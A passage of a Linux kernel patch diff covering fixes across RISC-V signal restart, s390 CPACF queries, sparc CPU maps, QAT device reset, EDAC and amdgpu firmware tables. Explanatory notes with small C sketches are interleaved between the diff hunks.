++	 * Get the signal to deliver. When running under ptrace, at this point
++	 * the debugger may change all of our registers.
++	 */
++	if (get_signal(&ksig)) {
++		/*
++		 * Depending on the signal settings, we may need to revert the
++		 * decision to restart the system call, but skip this if a
++		 * debugger has chosen to restart at a different PC.
++		 */
++		if (regs->epc == restart_addr &&
++		    (retval == -ERESTARTNOHAND ||
++		     retval == -ERESTART_RESTARTBLOCK ||
++		     (retval == -ERESTARTSYS &&
++		      !(ksig.ka.sa.sa_flags & SA_RESTART)))) {
++			regs->a0 = -EINTR;
++			regs->epc = continue_addr;
++		}
++
++		/* Actually deliver the signal */
++		handle_signal(&ksig, regs);
++		return;
++	}
++
++	/*
++	 * Handle restarting a different system call. As above, if a debugger
++	 * has chosen to restart at a different PC, ignore the restart.
++	 */
++	if (syscall && regs->epc == restart_addr && retval == -ERESTART_RESTARTBLOCK)
++		regs->a7 = __NR_restart_syscall;
++
+ 	/*
+ 	 * If there is no signal to deliver, we just put the saved
+ 	 * sigmask back.
+diff --git a/arch/s390/include/asm/cpacf.h b/arch/s390/include/asm/cpacf.h
+index 646b12981f208..0f6ff2008a159 100644
+--- a/arch/s390/include/asm/cpacf.h
++++ b/arch/s390/include/asm/cpacf.h
+@@ -161,28 +161,86 @@
+ 
+ typedef struct { unsigned char bytes[16]; } cpacf_mask_t;
+ 
+-/**
+- * cpacf_query() - check if a specific CPACF function is available
+- * @opcode: the opcode of the crypto instruction
+- * @func: the function code to test for
+- *
+- * Executes the query function for the given crypto instruction @opcode
+- * and checks if @func is available
+- *
+- * Returns 1 if @func is available for @opcode, 0 otherwise
++/*
++ * Prototype for a not existing function to produce a link
++ * error if __cpacf_query() or __cpacf_check_opcode() is used
++ * with an invalid compile time const opcode.
+  */
+-static __always_inline void __cpacf_query(unsigned int opcode, cpacf_mask_t *mask)
++void __cpacf_bad_opcode(void);
++
++static __always_inline void __cpacf_query_rre(u32 opc, u8 r1, u8 r2,
++					      cpacf_mask_t *mask)
+ {
+ 	asm volatile(
+-		"	lghi	0,0\n" /* query function */
+-		"	lgr	1,%[mask]\n"
+-		"	spm	0\n" /* pckmo doesn't change the cc */
+-		/* Parameter regs are ignored, but must be nonzero and unique */
+-		"0:	.insn	rrf,%[opc] << 16,2,4,6,0\n"
+-		"	brc	1,0b\n"	/* handle partial completion */
+-		: "=m" (*mask)
+-		: [mask] "d" ((unsigned long)mask), [opc] "i" (opcode)
+-		: "cc", "0", "1");
++		"	la	%%r1,%[mask]\n"
++		"	xgr	%%r0,%%r0\n"
++		"	.insn	rre,%[opc] << 16,%[r1],%[r2]\n"
++		: [mask] "=R" (*mask)
++		: [opc] "i" (opc),
++		  [r1] "i" (r1), [r2] "i" (r2)
++		: "cc", "r0", "r1");
++}
++
++static __always_inline void __cpacf_query_rrf(u32 opc,
++					      u8 r1, u8 r2, u8 r3, u8 m4,
++					      cpacf_mask_t *mask)
++{
++	asm volatile(
++		"	la	%%r1,%[mask]\n"
++		"	xgr	%%r0,%%r0\n"
++		"	.insn	rrf,%[opc] << 16,%[r1],%[r2],%[r3],%[m4]\n"
++		: [mask] "=R" (*mask)
++		: [opc] "i" (opc), [r1] "i" (r1), [r2] "i" (r2),
++		  [r3] "i" (r3), [m4] "i" (m4)
++		: "cc", "r0", "r1");
++}
++
++static __always_inline void __cpacf_query(unsigned int opcode,
++					  cpacf_mask_t *mask)
++{
++	switch (opcode) {
++	case CPACF_KDSA:
++		__cpacf_query_rre(CPACF_KDSA, 0, 2, mask);
++		break;
++	case CPACF_KIMD:
++		__cpacf_query_rre(CPACF_KIMD, 0, 2, mask);
++		break;
++	case CPACF_KLMD:
++		__cpacf_query_rre(CPACF_KLMD, 0, 2, mask);
++		break;
++	case CPACF_KM:
++		__cpacf_query_rre(CPACF_KM, 2, 4, mask);
++		break;
++	case CPACF_KMA:
++		__cpacf_query_rrf(CPACF_KMA, 2, 4, 6, 0, mask);
++		break;
++	case CPACF_KMAC:
++		__cpacf_query_rre(CPACF_KMAC, 0, 2, mask);
++		break;
++	case CPACF_KMC:
++		__cpacf_query_rre(CPACF_KMC, 2, 4, mask);
++		break;
++	case CPACF_KMCTR:
++		__cpacf_query_rrf(CPACF_KMCTR, 2, 4, 6, 0, mask);
++		break;
++	case CPACF_KMF:
++		__cpacf_query_rre(CPACF_KMF, 2, 4, mask);
++		break;
++	case CPACF_KMO:
++		__cpacf_query_rre(CPACF_KMO, 2, 4, mask);
++		break;
++	case CPACF_PCC:
++		__cpacf_query_rre(CPACF_PCC, 0, 0, mask);
++		break;
++	case CPACF_PCKMO:
++		__cpacf_query_rre(CPACF_PCKMO, 0, 0, mask);
++		break;
++	case CPACF_PRNO:
++		__cpacf_query_rre(CPACF_PRNO, 2, 4, mask);
++		break;
++	default:
++		__cpacf_bad_opcode();
++	}
+ }
+ 
+ static __always_inline int __cpacf_check_opcode(unsigned int opcode)
+@@ -206,10 +264,21 @@ static __always_inline int __cpacf_check_opcode(unsigned int opcode)
+ 	case CPACF_KMA:
+ 		return test_facility(146);	/* check for MSA8 */
+ 	default:
+-		BUG();
++		__cpacf_bad_opcode();
++		return 0;
+ 	}
+ }
+ 
++/**
++ * cpacf_query() - check if a specific CPACF function is available
++ * @opcode: the opcode of the crypto instruction
++ * @func: the function code to test for
++ *
++ * Executes the query function for the given crypto instruction @opcode
++ * and checks if @func is available
++ *
++ * Returns 1 if @func is available for @opcode, 0 otherwise
++ */
+ static __always_inline int cpacf_query(unsigned int opcode, cpacf_mask_t *mask)
+ {
+ 	if (__cpacf_check_opcode(opcode)) {
+diff --git a/arch/s390/include/asm/pgtable.h b/arch/s390/include/asm/pgtable.h
+index 11e901286414c..956300e3568a4 100644
+--- a/arch/s390/include/asm/pgtable.h
++++ b/arch/s390/include/asm/pgtable.h
+@@ -1686,8 +1686,10 @@ static inline pmd_t pmdp_huge_clear_flush(struct vm_area_struct *vma,
+ static inline pmd_t pmdp_invalidate(struct vm_area_struct *vma,
+ 				   unsigned long addr, pmd_t *pmdp)
+ {
+-	pmd_t pmd = __pmd(pmd_val(*pmdp) | _SEGMENT_ENTRY_INVALID);
++	pmd_t pmd;
+ 
++	VM_WARN_ON_ONCE(!pmd_present(*pmdp));
++	pmd = __pmd(pmd_val(*pmdp) | _SEGMENT_ENTRY_INVALID);
+ 	return pmdp_xchg_direct(vma->vm_mm, addr, pmdp, pmd);
+ }
+ 
+diff --git a/arch/sparc/include/asm/smp_64.h b/arch/sparc/include/asm/smp_64.h
+index e75783b6abc42..16ab904616a0c 100644
+--- a/arch/sparc/include/asm/smp_64.h
++++ b/arch/sparc/include/asm/smp_64.h
+@@ -47,7 +47,6 @@ void arch_send_call_function_ipi_mask(const struct cpumask *mask);
+ int hard_smp_processor_id(void);
+ #define raw_smp_processor_id() (current_thread_info()->cpu)
+ 
+-void smp_fill_in_cpu_possible_map(void);
+ void smp_fill_in_sib_core_maps(void);
+ void cpu_play_dead(void);
+ 
+@@ -77,7 +76,6 @@ void __cpu_die(unsigned int cpu);
+ #define smp_fill_in_sib_core_maps() do { } while (0)
+ #define smp_fetch_global_regs() do { } while (0)
+ #define smp_fetch_global_pmu() do { } while (0)
+-#define smp_fill_in_cpu_possible_map() do { } while (0)
+ #define smp_init_cpu_poke() do { } while (0)
+ #define scheduler_poke() do { } while (0)
+ 
+diff --git a/arch/sparc/include/uapi/asm/termbits.h b/arch/sparc/include/uapi/asm/termbits.h
+index 4321322701fcf..0da2b1adc0f52 100644
+--- a/arch/sparc/include/uapi/asm/termbits.h
++++ b/arch/sparc/include/uapi/asm/termbits.h
+@@ -10,16 +10,6 @@ typedef unsigned int	tcflag_t;
+ typedef unsigned long	tcflag_t;
+ #endif
+ 
+-#define NCC 8
+-struct termio {
+-	unsigned short c_iflag;		/* input mode flags */
+-	unsigned short c_oflag;		/* output mode flags */
+-	unsigned short c_cflag;		/* control mode flags */
+-	unsigned short c_lflag;		/* local mode flags */
+-	unsigned char c_line;		/* line discipline */
+-	unsigned char c_cc[NCC];	/* control characters */
+-};
+-
+ #define NCCS 17
+ struct termios {
+ 	tcflag_t c_iflag;		/* input mode flags */
+diff --git a/arch/sparc/include/uapi/asm/termios.h b/arch/sparc/include/uapi/asm/termios.h
+index ee86f4093d83e..cceb32260881e 100644
+--- a/arch/sparc/include/uapi/asm/termios.h
++++ b/arch/sparc/include/uapi/asm/termios.h
+@@ -40,5 +40,14 @@ struct winsize {
+ 	unsigned short ws_ypixel;
+ };
+ 
++#define NCC 8
++struct termio {
++	unsigned short c_iflag;		/* input mode flags */
++	unsigned short c_oflag;		/* output mode flags */
++	unsigned short c_cflag;		/* control mode flags */
++	unsigned short c_lflag;		/* local mode flags */
++	unsigned char c_line;		/* line discipline */
++	unsigned char c_cc[NCC];	/* control characters */
++};
+ 
+ #endif /* _UAPI_SPARC_TERMIOS_H */
+diff --git a/arch/sparc/kernel/prom_64.c b/arch/sparc/kernel/prom_64.c
+index f883a50fa3339..4eae633f71982 100644
+--- a/arch/sparc/kernel/prom_64.c
++++ b/arch/sparc/kernel/prom_64.c
+@@ -483,7 +483,9 @@ static void *record_one_cpu(struct device_node *dp, int cpuid, int arg)
+ 	ncpus_probed++;
+ #ifdef CONFIG_SMP
+ 	set_cpu_present(cpuid, true);
+-	set_cpu_possible(cpuid, true);
++
++	if (num_possible_cpus() < nr_cpu_ids)
++		set_cpu_possible(cpuid, true);
+ #endif
+ 	return NULL;
+ }
+diff --git a/arch/sparc/kernel/setup_64.c b/arch/sparc/kernel/setup_64.c
+index 48abee4eee29d..9e6e7f983d142 100644
+--- a/arch/sparc/kernel/setup_64.c
++++ b/arch/sparc/kernel/setup_64.c
+@@ -684,7 +684,6 @@ void __init setup_arch(char **cmdline_p)
+ 
+ 	paging_init();
+ 	init_sparc64_elf_hwcap();
+-	smp_fill_in_cpu_possible_map();
+ 	/*
+ 	 * Once the OF device tree and MDESC have been setup and nr_cpus has
+ 	 * been parsed, we know the list of possible cpus.  Therefore we can
+diff --git a/arch/sparc/kernel/smp_64.c b/arch/sparc/kernel/smp_64.c
+index a55295d1b9244..35e8a1e84da60 100644
+--- a/arch/sparc/kernel/smp_64.c
++++ b/arch/sparc/kernel/smp_64.c
+@@ -1204,20 +1204,6 @@ void __init smp_setup_processor_id(void)
+ 		xcall_deliver_impl = hypervisor_xcall_deliver;
+ }
+ 
+-void __init smp_fill_in_cpu_possible_map(void)
+-{
+-	int possible_cpus = num_possible_cpus();
+-	int i;
+-
+-	if (possible_cpus > nr_cpu_ids)
+-		possible_cpus = nr_cpu_ids;
+-
+-	for (i = 0; i < possible_cpus; i++)
+-		set_cpu_possible(i, true);
+-	for (; i < NR_CPUS; i++)
+-		set_cpu_possible(i, false);
+-}
+-
+ void smp_fill_in_sib_core_maps(void)
+ {
+ 	unsigned int i;
+diff --git a/arch/sparc/mm/tlb.c b/arch/sparc/mm/tlb.c
+index 9a725547578e8..946f33c1b032f 100644
+--- a/arch/sparc/mm/tlb.c
++++ b/arch/sparc/mm/tlb.c
+@@ -245,6 +245,7 @@ pmd_t pmdp_invalidate(struct vm_area_struct *vma, unsigned long address,
+ {
+ 	pmd_t old, entry;
+ 
++	VM_WARN_ON_ONCE(!pmd_present(*pmdp));
+ 	entry = __pmd(pmd_val(*pmdp) & ~_PAGE_VALID);
+ 	old = pmdp_establish(vma, address, pmdp, entry);
+ 	flush_tlb_range(vma, address, address + HPAGE_PMD_SIZE);
+diff --git a/arch/x86/mm/pgtable.c b/arch/x86/mm/pgtable.c
+index 8525f2876fb40..77ee0012f8497 100644
+--- a/arch/x86/mm/pgtable.c
++++ b/arch/x86/mm/pgtable.c
+@@ -615,6 +615,8 @@ int pmdp_clear_flush_young(struct vm_area_struct *vma,
+ pmd_t pmdp_invalidate_ad(struct vm_area_struct *vma, unsigned long address,
+ 			 pmd_t *pmdp)
+ {
++	VM_WARN_ON_ONCE(!pmd_present(*pmdp));
++
+ 	/*
+ 	 * No flush is necessary. Once an invalid PTE is established, the PTE's
+ 	 * access and dirty bits cannot be updated.
+diff --git a/crypto/ecdsa.c b/crypto/ecdsa.c
+index fbd76498aba83..3f9ec273a121f 100644
+--- a/crypto/ecdsa.c
++++ b/crypto/ecdsa.c
+@@ -373,4 +373,7 @@ module_exit(ecdsa_exit);
+ MODULE_LICENSE("GPL");
+ MODULE_AUTHOR("Stefan Berger <stefanb@linux.ibm.com>");
+ MODULE_DESCRIPTION("ECDSA generic algorithm");
++MODULE_ALIAS_CRYPTO("ecdsa-nist-p192");
++MODULE_ALIAS_CRYPTO("ecdsa-nist-p256");
++MODULE_ALIAS_CRYPTO("ecdsa-nist-p384");
+ MODULE_ALIAS_CRYPTO("ecdsa-generic");
+diff --git a/crypto/ecrdsa.c b/crypto/ecrdsa.c
+index f3c6b5e15e75b..3811f3805b5d8 100644
+--- a/crypto/ecrdsa.c
++++ b/crypto/ecrdsa.c
+@@ -294,4 +294,5 @@ module_exit(ecrdsa_mod_fini);
+ MODULE_LICENSE("GPL");
+ MODULE_AUTHOR("Vitaly Chikunov <vt@altlinux.org>");
+ MODULE_DESCRIPTION("EC-RDSA generic algorithm");
++MODULE_ALIAS_CRYPTO("ecrdsa");
+ MODULE_ALIAS_CRYPTO("ecrdsa-generic");
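These MODULE_ALIAS_CRYPTO() additions matter for autoloading: when an
algorithm is looked up by name, the crypto core request_module()s
"crypto-<name>", so without per-name aliases a request for, say,
"ecdsa-nist-p256" or "ecrdsa" would not pull in the module. A hedged
kernel-side sketch of such a lookup (error handling trimmed):

#include <crypto/akcipher.h>
#include <linux/err.h>

/* Allocating by name triggers request_module("crypto-ecdsa-nist-p256")
 * if the algorithm is not registered yet; the aliases added above are
 * what let that lookup resolve to the right module. */
static int probe_ecdsa_p256(void)
{
	struct crypto_akcipher *tfm;

	tfm = crypto_alloc_akcipher("ecdsa-nist-p256", 0, 0);
	if (IS_ERR(tfm))
		return PTR_ERR(tfm);

	crypto_free_akcipher(tfm);
	return 0;
}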
+diff --git a/drivers/acpi/resource.c b/drivers/acpi/resource.c
+index 1c5c1a269fbee..d34812db1b67a 100644
+--- a/drivers/acpi/resource.c
++++ b/drivers/acpi/resource.c
+@@ -576,6 +576,18 @@ static const struct dmi_system_id lg_laptop[] = {
+ 			DMI_MATCH(DMI_BOARD_NAME, "X577"),
+ 		},
+ 	},
++	{
++		/* TongFang GXxHRXx/TUXEDO InfinityBook Pro Gen9 AMD */
++		.matches = {
++			DMI_MATCH(DMI_BOARD_NAME, "GXxHRXx"),
++		},
++	},
++	{
++		/* TongFang GMxHGxx/TUXEDO Stellaris Slim Gen1 AMD */
++		.matches = {
++			DMI_MATCH(DMI_BOARD_NAME, "GMxHGxx"),
++		},
++	},
+ 	{ }
+ };
+ 
+diff --git a/drivers/ata/pata_legacy.c b/drivers/ata/pata_legacy.c
+index 03c580625c2cc..55b462ce99df0 100644
+--- a/drivers/ata/pata_legacy.c
++++ b/drivers/ata/pata_legacy.c
+@@ -173,8 +173,6 @@ static int legacy_port[NR_HOST] = { 0x1f0, 0x170, 0x1e8, 0x168, 0x1e0, 0x160 };
+ static struct legacy_probe probe_list[NR_HOST];
+ static struct legacy_data legacy_data[NR_HOST];
+ static struct ata_host *legacy_host[NR_HOST];
+-static int nr_legacy_host;
+-
+ 
+ /**
+  *	legacy_probe_add	-	Add interface to probe list
+@@ -1276,9 +1274,11 @@ static __exit void legacy_exit(void)
+ {
+ 	int i;
+ 
+-	for (i = 0; i < nr_legacy_host; i++) {
++	for (i = 0; i < NR_HOST; i++) {
+ 		struct legacy_data *ld = &legacy_data[i];
+-		ata_host_detach(legacy_host[i]);
++
++		if (legacy_host[i])
++			ata_host_detach(legacy_host[i]);
+ 		platform_device_unregister(ld->platform_dev);
+ 	}
+ }
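With nr_legacy_host gone, legacy_exit() now walks the whole fixed slot
array and tolerates holes, rather than trusting a counter that can go
stale after a partial probe. A small userspace sketch of the idiom
(names illustrative):

#include <stdio.h>

#define NR_SLOT 4

static int *slots[NR_SLOT];	/* sparse: failed probes leave NULLs */

static void teardown_all(void)
{
	/* Walk the entire fixed array and skip empty slots instead of
	 * maintaining a separate "how many succeeded" count. */
	for (int i = 0; i < NR_SLOT; i++)
		if (slots[i])
			printf("detach slot %d\n", i);
}

int main(void)
{
	static int dev;

	slots[2] = &dev;	/* only slot 2 probed successfully */
	teardown_all();
	return 0;
}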
+diff --git a/drivers/bluetooth/btrtl.c b/drivers/bluetooth/btrtl.c
+index ead632595ce06..5671f0d9ab28c 100644
+--- a/drivers/bluetooth/btrtl.c
++++ b/drivers/bluetooth/btrtl.c
+@@ -1074,19 +1074,33 @@ MODULE_FIRMWARE("rtl_bt/rtl8723cs_vf_fw.bin");
+ MODULE_FIRMWARE("rtl_bt/rtl8723cs_vf_config.bin");
+ MODULE_FIRMWARE("rtl_bt/rtl8723cs_xx_fw.bin");
+ MODULE_FIRMWARE("rtl_bt/rtl8723cs_xx_config.bin");
++MODULE_FIRMWARE("rtl_bt/rtl8723d_fw.bin");
++MODULE_FIRMWARE("rtl_bt/rtl8723d_config.bin");
+ MODULE_FIRMWARE("rtl_bt/rtl8723ds_fw.bin");
+ MODULE_FIRMWARE("rtl_bt/rtl8723ds_config.bin");
+ MODULE_FIRMWARE("rtl_bt/rtl8761a_fw.bin");
+ MODULE_FIRMWARE("rtl_bt/rtl8761a_config.bin");
++MODULE_FIRMWARE("rtl_bt/rtl8761b_fw.bin");
++MODULE_FIRMWARE("rtl_bt/rtl8761b_config.bin");
++MODULE_FIRMWARE("rtl_bt/rtl8761bu_fw.bin");
++MODULE_FIRMWARE("rtl_bt/rtl8761bu_config.bin");
+ MODULE_FIRMWARE("rtl_bt/rtl8821a_fw.bin");
+ MODULE_FIRMWARE("rtl_bt/rtl8821a_config.bin");
++MODULE_FIRMWARE("rtl_bt/rtl8821c_fw.bin");
++MODULE_FIRMWARE("rtl_bt/rtl8821c_config.bin");
++MODULE_FIRMWARE("rtl_bt/rtl8821cs_fw.bin");
++MODULE_FIRMWARE("rtl_bt/rtl8821cs_config.bin");
+ MODULE_FIRMWARE("rtl_bt/rtl8822b_fw.bin");
+ MODULE_FIRMWARE("rtl_bt/rtl8822b_config.bin");
++MODULE_FIRMWARE("rtl_bt/rtl8822cs_fw.bin");
++MODULE_FIRMWARE("rtl_bt/rtl8822cs_config.bin");
++MODULE_FIRMWARE("rtl_bt/rtl8822cu_fw.bin");
++MODULE_FIRMWARE("rtl_bt/rtl8822cu_config.bin");
++MODULE_FIRMWARE("rtl_bt/rtl8851bu_fw.bin");
++MODULE_FIRMWARE("rtl_bt/rtl8851bu_config.bin");
+ MODULE_FIRMWARE("rtl_bt/rtl8852au_fw.bin");
+ MODULE_FIRMWARE("rtl_bt/rtl8852au_config.bin");
+ MODULE_FIRMWARE("rtl_bt/rtl8852bu_fw.bin");
+ MODULE_FIRMWARE("rtl_bt/rtl8852bu_config.bin");
+ MODULE_FIRMWARE("rtl_bt/rtl8852cu_fw.bin");
+ MODULE_FIRMWARE("rtl_bt/rtl8852cu_config.bin");
+-MODULE_FIRMWARE("rtl_bt/rtl8851bu_fw.bin");
+-MODULE_FIRMWARE("rtl_bt/rtl8851bu_config.bin");
+diff --git a/drivers/cpufreq/amd-pstate.c b/drivers/cpufreq/amd-pstate.c
+index 90dcf26f09731..9f147e9eafb63 100644
+--- a/drivers/cpufreq/amd-pstate.c
++++ b/drivers/cpufreq/amd-pstate.c
+@@ -424,7 +424,7 @@ static int amd_pstate_set_boost(struct cpufreq_policy *policy, int state)
+ 	if (state)
+ 		policy->cpuinfo.max_freq = cpudata->max_freq;
+ 	else
+-		policy->cpuinfo.max_freq = cpudata->nominal_freq;
++		policy->cpuinfo.max_freq = cpudata->nominal_freq * 1000;
+ 
+ 	policy->max = policy->cpuinfo.max_freq;
+ 
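The amd-pstate one-liner is a unit fix: cpudata->nominal_freq is cached
in MHz while the cpufreq core's cpuinfo fields are in kHz, so disabling
boost was shrinking the reported maximum by a factor of 1000. Sketch of
the conversion with illustrative values:

#include <stdio.h>

int main(void)
{
	unsigned int nominal_mhz = 2800;		/* driver cache, MHz */
	unsigned int cpuinfo_khz = nominal_mhz * 1000;	/* cpufreq unit, kHz */

	printf("%u kHz\n", cpuinfo_khz);	/* 2800000 */
	return 0;
}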
+diff --git a/drivers/crypto/qat/qat_common/adf_aer.c b/drivers/crypto/qat/qat_common/adf_aer.c
+index 4f36b5a9164a7..d4bf6cd927a2a 100644
+--- a/drivers/crypto/qat/qat_common/adf_aer.c
++++ b/drivers/crypto/qat/qat_common/adf_aer.c
+@@ -95,8 +95,7 @@ static void adf_device_reset_worker(struct work_struct *work)
+ 	if (adf_dev_init(accel_dev) || adf_dev_start(accel_dev)) {
+ 		/* The device hung and we can't restart it, so stop here */
+ 		dev_err(&GET_DEV(accel_dev), "Restart device failed\n");
+-		if (reset_data->mode == ADF_DEV_RESET_ASYNC ||
+-		    completion_done(&reset_data->compl))
++		if (reset_data->mode == ADF_DEV_RESET_ASYNC)
+ 			kfree(reset_data);
+ 		WARN(1, "QAT: device restart failed. Device is unusable\n");
+ 		return;
+@@ -104,16 +103,8 @@ static void adf_device_reset_worker(struct work_struct *work)
+ 	adf_dev_restarted_notify(accel_dev);
+ 	clear_bit(ADF_STATUS_RESTARTING, &accel_dev->status);
+ 
+-	/*
+-	 * The dev is back alive. Notify the caller if in sync mode
+-	 *
+-	 * If device restart will take a more time than expected,
+-	 * the schedule_reset() function can timeout and exit. This can be
+-	 * detected by calling the completion_done() function. In this case
+-	 * the reset_data structure needs to be freed here.
+-	 */
+-	if (reset_data->mode == ADF_DEV_RESET_ASYNC ||
+-	    completion_done(&reset_data->compl))
++	/* The dev is back alive. Notify the caller if in sync mode */
++	if (reset_data->mode == ADF_DEV_RESET_ASYNC)
+ 		kfree(reset_data);
+ 	else
+ 		complete(&reset_data->compl);
+@@ -148,10 +139,10 @@ static int adf_dev_aer_schedule_reset(struct adf_accel_dev *accel_dev,
+ 		if (!timeout) {
+ 			dev_err(&GET_DEV(accel_dev),
+ 				"Reset device timeout expired\n");
++			cancel_work_sync(&reset_data->reset_work);
+ 			ret = -EFAULT;
+-		} else {
+-			kfree(reset_data);
+ 		}
++		kfree(reset_data);
+ 		return ret;
+ 	}
+ 	return 0;
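The reworked QAT paths settle on single ownership for reset_data in
sync mode: the caller that scheduled the work always frees it, and on
timeout it first calls cancel_work_sync() so the worker can no longer
touch the object; the worker frees only in async mode. A self-contained
sketch of the pattern (generic names, not the driver's):

#include <linux/completion.h>
#include <linux/slab.h>
#include <linux/workqueue.h>

struct reset_ctx {
	struct work_struct work;
	struct completion done;
};

static void reset_fn(struct work_struct *work)
{
	struct reset_ctx *ctx = container_of(work, struct reset_ctx, work);

	/* ... perform the reset ... */
	complete(&ctx->done);		/* sync mode: caller frees ctx */
}

static int do_sync_reset(struct workqueue_struct *wq, unsigned long tmo)
{
	struct reset_ctx *ctx = kzalloc(sizeof(*ctx), GFP_KERNEL);
	int ret = 0;

	if (!ctx)
		return -ENOMEM;

	init_completion(&ctx->done);
	INIT_WORK(&ctx->work, reset_fn);
	queue_work(wq, &ctx->work);

	if (!wait_for_completion_timeout(&ctx->done, tmo)) {
		cancel_work_sync(&ctx->work);	/* worker gone before free */
		ret = -EFAULT;
	}

	kfree(ctx);	/* single owner: sync caller always frees */
	return ret;
}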
+diff --git a/drivers/edac/igen6_edac.c b/drivers/edac/igen6_edac.c
+index 8ec70da8d84fe..c46880a934da0 100644
+--- a/drivers/edac/igen6_edac.c
++++ b/drivers/edac/igen6_edac.c
+@@ -627,7 +627,7 @@ static int errcmd_enable_error_reporting(bool enable)
+ 
+ 	rc = pci_read_config_word(imc->pdev, ERRCMD_OFFSET, &errcmd);
+ 	if (rc)
+-		return rc;
++		return pcibios_err_to_errno(rc);
+ 
+ 	if (enable)
+ 		errcmd |= ERRCMD_CE | ERRSTS_UE;
+@@ -636,7 +636,7 @@ static int errcmd_enable_error_reporting(bool enable)
+ 
+ 	rc = pci_write_config_word(imc->pdev, ERRCMD_OFFSET, errcmd);
+ 	if (rc)
+-		return rc;
++		return pcibios_err_to_errno(rc);
+ 
+ 	return 0;
+ }
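Background for the two igen6 conversions: PCI config-space accessors
return positive PCIBIOS_* codes, not negative errnos, so passing them
up unconverted hands callers a success-looking positive value.
pcibios_err_to_errno() does the mapping; a hedged sketch:

#include <linux/pci.h>

static int read_errcmd(struct pci_dev *pdev, int where, u16 *val)
{
	int rc = pci_read_config_word(pdev, where, val);

	/* PCIBIOS_SUCCESSFUL is 0; anything else maps to an errno. */
	return rc ? pcibios_err_to_errno(rc) : 0;
}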
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_atomfirmware.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_atomfirmware.c
+index 9b97fa39d47a2..0d017dc94f013 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_atomfirmware.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_atomfirmware.c
+@@ -207,6 +207,7 @@ union igp_info {
+ 	struct atom_integrated_system_info_v1_11 v11;
+ 	struct atom_integrated_system_info_v1_12 v12;
+ 	struct atom_integrated_system_info_v2_1 v21;
++	struct atom_integrated_system_info_v2_3 v23;
+ };
+ 
+ union umc_info {
+@@ -347,6 +348,20 @@ amdgpu_atomfirmware_get_vram_info(struct amdgpu_device *adev,
+ 					if (vram_type)
+ 						*vram_type = convert_atom_mem_type_to_vram_type(adev, mem_type);
+ 					break;
++				case 3:
++					mem_channel_number = igp_info->v23.umachannelnumber;
++					if (!mem_channel_number)
++						mem_channel_number = 1;
++					mem_type = igp_info->v23.memorytype;
++					if (mem_type == LpDdr5MemType)
++						mem_channel_width = 32;
++					else
++						mem_channel_width = 64;
++					if (vram_width)
++						*vram_width = mem_channel_number * mem_channel_width;
++					if (vram_type)
++						*vram_type = convert_atom_mem_type_to_vram_type(adev, mem_type);
++					break;
+ 				default:
+ 					return -EINVAL;
+ 				}
+diff --git a/drivers/gpu/drm/amd/amdgpu/sdma_v4_0.c b/drivers/gpu/drm/amd/amdgpu/sdma_v4_0.c
+index 97b033dfe9e45..68cdb6682776a 100644
+--- a/drivers/gpu/drm/amd/amdgpu/sdma_v4_0.c
++++ b/drivers/gpu/drm/amd/amdgpu/sdma_v4_0.c
+@@ -2049,6 +2049,9 @@ static int sdma_v4_0_process_trap_irq(struct amdgpu_device *adev,
+ 
+ 	DRM_DEBUG("IH: SDMA trap\n");
+ 	instance = sdma_v4_0_irq_id_to_seq(entry->client_id);
++	if (instance < 0)
++		return instance;
++
+ 	switch (entry->ring_id) {
+ 	case 0:
+ 		amdgpu_fence_process(&adev->sdma.instance[instance].ring);
+diff --git a/drivers/gpu/drm/amd/include/atomfirmware.h b/drivers/gpu/drm/amd/include/atomfirmware.h
+index bbe1337a8cee3..e2207f1c5bad3 100644
+--- a/drivers/gpu/drm/amd/include/atomfirmware.h
++++ b/drivers/gpu/drm/amd/include/atomfirmware.h
+@@ -1624,6 +1624,49 @@ struct atom_integrated_system_info_v2_2
+ 	uint32_t  reserved4[189];
+ };
+ 
++struct uma_carveout_option {
++  char       optionName[29];        //max length of string is 28 chars + '\0'. Current design is for "minimum", "Medium", "High". This makes the entire struct size 64 bits
++  uint8_t    memoryCarvedGb;        //memory carved out with setting
++  uint8_t    memoryRemainingGb;     //memory remaining on system
++  union {
++    struct _flags {
++      uint8_t Auto     : 1;
++      uint8_t Custom   : 1;
++      uint8_t Reserved : 6;
++    } flags;
++    uint8_t all8;
++  } uma_carveout_option_flags;
++};
++
++struct atom_integrated_system_info_v2_3 {
++  struct  atom_common_table_header table_header;
++  uint32_t  vbios_misc; // enum of atom_system_vbiosmisc_def
++  uint32_t  gpucapinfo; // enum of atom_system_gpucapinf_def
++  uint32_t  system_config;
++  uint32_t  cpucapinfo;
++  uint16_t  gpuclk_ss_percentage; // unit of 0.001%,   1000 mean 1%
++  uint16_t  gpuclk_ss_type;
++  uint16_t  dpphy_override;  // bit vector, enum of atom_sysinfo_dpphy_override_def
++  uint8_t memorytype;       // enum of atom_dmi_t17_mem_type_def, APU memory type indication.
++  uint8_t umachannelnumber; // number of memory channels
++  uint8_t htc_hyst_limit;
++  uint8_t htc_tmp_limit;
++  uint8_t reserved1; // dp_ss_control
++  uint8_t gpu_package_id;
++  struct  edp_info_table  edp1_info;
++  struct  edp_info_table  edp2_info;
++  uint32_t  reserved2[8];
++  struct  atom_external_display_connection_info extdispconninfo;
++  uint8_t UMACarveoutVersion;
++  uint8_t UMACarveoutIndexMax;
++  uint8_t UMACarveoutTypeDefault;
++  uint8_t UMACarveoutIndexDefault;
++  uint8_t UMACarveoutType;           //Auto or Custom
++  uint8_t UMACarveoutIndex;
++  struct  uma_carveout_option UMASizeControlOption[20];
++  uint8_t reserved3[110];
++};
++
+ // system_config
+ enum atom_system_vbiosmisc_def{
+   INTEGRATED_SYSTEM_INFO__GET_EDID_CALLBACK_FUNC_SUPPORT = 0x01,
+diff --git a/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_4_ppt.c b/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_4_ppt.c
+index 5de31961319a2..b464a1f7e393c 100644
+--- a/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_4_ppt.c
++++ b/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_4_ppt.c
+@@ -222,15 +222,17 @@ static int smu_v13_0_4_system_features_control(struct smu_context *smu, bool en)
+ 	struct amdgpu_device *adev = smu->adev;
+ 	int ret = 0;
+ 
+-	if (!en && adev->in_s4) {
+-		/* Adds a GFX reset as workaround just before sending the
+-		 * MP1_UNLOAD message to prevent GC/RLC/PMFW from entering
+-		 * an invalid state.
+-		 */
